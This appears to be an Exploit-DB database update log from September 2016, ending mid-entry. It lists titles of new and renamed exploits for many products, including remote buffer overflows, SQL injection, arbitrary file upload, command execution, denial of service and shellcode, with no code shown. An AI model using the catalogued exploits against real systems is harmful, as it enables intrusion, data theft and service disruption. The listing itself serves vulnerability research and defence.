DB: 2016-09-09
11 new exploits Samba 3.0.4 - SWAT Authorization Buffer Overflow Samba 3.0.4 SWAT - Authorisation Buffer Overflow Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2) HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit) HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit) WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC) WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC) FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service Multiple Applications - Local Credentials Disclosure Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2) Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2) IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC) Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC) Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC) Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC) Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC) Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC) SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC) MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow Joomla Component JPad 1.0 - Post-Authentication SQL Injection Joomla Component JPad 1.0 - Authenticated SQL Injection CMS Made Simple 1.2.4 - (FileManager module) File Upload CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication) freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated) freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection AvailScript Jobs Portal Script - (Post-Authentication) File Upload AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service Serv-U 7.3 - (Authenticated) Remote FTP File Replacement Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC) Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC AJ Auction Authentication - Bypass Exploit AJ Auction - Authentication Bypass Simple Directory Listing 2 - Cross-Site File Upload Simple Directory Listing 2 - Cross-Site Arbitrary File Upload Mini File Host 1.x - Arbitrary PHP File Upload Mini File Host 1.x - Arbitrary .PHP File Upload Memberkit 1.0 - Remote PHP File Upload Memberkit 1.0 - Remote Arbitrary .PHP File Upload WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC) Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC) WikkiTikkiTavi 1.11 - Remote PHP File Upload WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation zFeeder 1.6 - 'admin.php' Pre-Authentication zFeeder 1.6 - 'admin.php' Unauthenticated Addonics NAS Adapter - Post-Authentication Denial of Service Addonics NAS Adapter - Authenticated Denial of Service Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service Hannon Hill Cascade Server - (Post-Authentication) Command Execution Hannon Hill Cascade Server - (Authenticated) Command Execution Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC) XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC) Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal Adobe JRun 4 - (logfile) Authenticated Directory Traversal FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service NetAccess IP3 - (Post-Authentication) (ping option) Command Injection NetAccess IP3 - (Authenticated) (ping option) Command Injection Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC) httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC) Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC) Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit) eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2) uTorrent WebUI 0.370 - Authorization header Denial of Service uTorrent WebUI 0.370 - Authorisation Header Denial of Service Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass) ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass) Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass) BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass) dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting) dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting) Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit) Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit) UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow Achievo 1.4.3 - Multiple Authorization Flaws Achievo 1.4.3 - Multiple Authorisation Flaws PHPMotion 1.62 - 'FCKeditor' File Upload PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal Home FTP Server 1.11.1.149 - Authenticated Directory Traversal News Script PHP Pro - 'FCKeditor' File Upload News Script PHP Pro - 'FCKeditor' Arbitrary File Upload Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow MailEnable - Authorization Header Buffer Overflow MailEnable - Authorisation Header Buffer Overflow ColdFusion 8.0.1 - Arbitrary File Upload and Execution Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution ColdFusion 8.0.1 - Arbitrary File Upload / Execution Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution OpenX - banner-edit.php File Upload PHP Code Execution OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution Joomla 1.5.12 - tinybrowser File Upload Code Execution Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit If-CMS 2.07 - Pre-Authentication Local File Inclusion (1) If-CMS 2.07 - Unauthenticated Local File Inclusion (1) IPComp - encapsulation Pre-Authentication kernel memory Corruption IPComp - encapsulation Unauthenticated kernel memory Corruption SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass) Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass) Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP - (Authenticated) Remote Buffer Overflow If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2) If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass) DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit TomatoCart 1.1 - Post-Authentication Local File Inclusion TomatoCart 1.1 - Authenticated Local File Inclusion BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass QuiXplorer 2.3 - Bugtraq File Upload QuiXplorer 2.3 - Bugtraq Arbitrary File Upload QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit) QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit) Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter) Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter) BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection Dolibarr ERP & CRM 3 - Authenticated OS Command Injection V-CMS - PHP File Upload and Execution V-CMS - Arbitrary .PHP File Upload / Execution WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection WebCalendar 1.2.4 - Unauthenticated Remote Code Injection appRain CMF - Arbitrary PHP File Upload appRain CMF - Arbitrary .PHP File Upload EGallery - PHP File Upload EGallery - Arbitrary .PHP File Upload SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload WebPageTest - Arbitrary PHP File Upload WebPageTest - Arbitrary .PHP File Upload XODA 0.4.5 - Arbitrary PHP File Upload XODA 0.4.5 - Arbitrary .PHP File Upload Elcom CMS 7.4.10 - Community Manager Insecure File Upload Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1) OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2) Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1) Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit qdPM 7.0 - Arbitrary PHP File Upload qdPM 7.0 - Arbitrary .PHP File Upload Oracle Database - Authentication Protocol Security Bypass Oracle Database - Protocol Authentication Bypass Mod_NTLM 0.x - Authorization Heap Overflow Mod_NTLM 0.x - Authorisation Heap Overflow Mod_NTLM 0.x - Authorization Format String Mod_NTLM 0.x - Authorisation Format String Geeklog 1.3.x - Authentication SQL Injection Geeklog 1.3.x - Authenticated SQL Injection NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution MySQL - Remote Pre-Authentication User Enumeration MySQL - Remote Unauthenticated User Enumeration vbPortal 2.0 alpha 8.1 - Authentication SQL Injection vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1) DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3) WordPress WP-Property Plugin - PHP File Upload WordPress Asset-Manager Plugin - PHP File Upload WordPress WP-Property Plugin - Arbitrary .PHP File Upload WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2) Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun Novell NCP - Pre-Authentication Remote Root Exploit Novell NCP - Unauthenticated Remote Root Exploit Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass Polar Helpdesk 3.0 - Cookie Based Authentication Bypass IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution IRIS Citations Management Tool - (Authenticated) Remote Command Execution Polycom HDX - Telnet Authorization Bypass (Metasploit) Polycom HDX - Telnet Authentication Bypass (Metasploit) OpenEMR - PHP File Upload OpenEMR - Arbitrary .PHP File Upload PolarPearCMS - PHP File Upload PolarPearCMS - Arbitrary .PHP File Upload Apache 2.0.x - mod_ssl Remote Denial of Service Apache/mod_ssl 2.0.x - Remote Denial of Service phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal MoinMoin - twikidraw Action Traversal File Upload MoinMoin - twikidraw Action Traversal Arbitrary File Upload Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow FlexWATCH 3.0 - AIndex.asp Authorization Bypass FlexWATCH 3.0 - AIndex.asp Authentication Bypass HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload WordPress Curvo Themes - Cross-Site Request Forgery File Upload WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass PHPBB2 - Admin_Ug_Auth.php Administrative Bypass Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass Castripper 2.50.70 - '.pls' DEP Exploit Castripper 2.50.70 - '.pls' DEP Bypass Exploit Google Urchin 5.7.3 - Report.cgi Authorization Bypass Google Urchin 5.7.3 - Report.cgi Authentication Bypass Adobe Flash - Method Calls Use-After-Free Adobe Flash - Transform.colorTranform Getter Info Leak RSA Authentication Agent for Web 5.3 - URI redirection RSA Authentication Agent for Web 5.3 - URI Redirection Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow Zabbix 2.0 - 3.0.3 - SQL Injection ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload Katello (Red Hat Satellite) - users/update_roles Missing Authorization Katello (Red Hat Satellite) - users/update_roles Missing Authorisation Freepbx 13.0.x < 13.0.154 - Remote Command Execution FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution Jobberbase 2.0 - Multiple Vulnerabilities Windows x86 - Bind Shell TCP Shellcode WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution Moab < 7.2.9 - Authorization Bypass Moab < 7.2.9 - Authentication Bypass Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection Drupal Core < 7.32 - Pre-Authentication SQL Injection Drupal Core < 7.32 - Unauthenticated SQL Injection Tincd - Post-Authentication Remote TCP Stack Buffer Overflow Tincd - Authenticated Remote TCP Stack Buffer Overflow PMB 4.1.3 - Post-Authentication SQL Injection PMB 4.1.3 - Authenticated SQL Injection Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution ManageEngine Multiple Products - Authenticated File Upload ManageEngine Multiple Products - Authenticated Arbitrary File Upload Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass) Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass) Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection Symantec Web Gateway 5 - restore.php Authenticated Command Injection JBoss Seam 2 - Arbitrary File Upload and Execution JBoss Seam 2 - Arbitrary File Upload / Execution Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit) Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass JibberBook 2.3 - 'Login_form.php' Authentication Bypass Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution Zenoss 3.2.1 - Remote Post-Authentication Command Execution Zenoss 3.2.1 - Remote Authenticated Command Execution Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution Magento CE < 1.9.0.1 - Authenticated Remote Code Execution Netsweeper 4.0.9 - Arbitrary File Upload and Execution Netsweeper 4.0.9 - Arbitrary File Upload / Execution Netsweeper 4.0.8 - Arbitrary File Upload and Execution Netsweeper 4.0.8 - Arbitrary File Upload / Execution EasyITSP - 'customers_edit.php' Authentication Security Bypass EasyITSP - 'customers_edit.php' Authentication Bypass Wolf CMS - Arbitrary File Upload and Execution Wolf CMS - Arbitrary File Upload / Execution Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass) GLPI 0.85.5 - 